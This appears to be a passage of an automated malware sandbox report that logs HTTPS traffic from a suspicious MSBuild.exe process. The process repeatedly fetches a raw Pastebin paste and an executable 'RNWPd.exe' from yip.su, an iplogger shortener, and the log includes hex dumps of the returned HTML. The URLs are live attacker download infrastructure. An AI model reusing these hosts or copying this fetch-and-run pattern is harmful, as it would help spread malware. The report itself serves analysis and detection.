                    2024-09-16 19:23:46 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:46 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.649795104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:52 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:52 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433bc488774407-EWR
                    2024-09-16 19:23:52 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:52 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:52 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:52 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:52 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.649796188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:53 UTC902INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:53 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:53 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7QWIvRgfgmASZfJpsVe2ttPNi7KQqdezvYeESu52ydbNlp9olx8spWRlX%2FWS2ZiScO7N%2FGSRcA4%2Fgr2cj5GnoeJsy8HSXLBl8nbgOkechdmw%2FrvVo509ejc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433bc94aaa72c2-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:53 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:53 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                    Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                    2024-09-16 19:23:53 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                    Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                    2024-09-16 19:23:53 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                    Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                    2024-09-16 19:23:53 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                    Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                    2024-09-16 19:23:53 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                    Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                    2024-09-16 19:23:53 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:53 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    66192.168.2.649797104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:58 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:58 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433be95cbdc436-EWR
                    2024-09-16 19:23:58 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:58 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:58 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:58 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:58 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    67192.168.2.649798188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:59 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:59 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:59 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:59 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTqrw2FhivWqey0geRkCaNXHC8MK%2FUAJvUs3vFTdLpVnikULcnrQPRJNvu9UDTvH2nX2hY8CW6G6CJCROForznmGmLaAeUZ1p8ufdBHxZp%2FDn04iTe%2F8Mag%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433beece3d1962-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:59 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
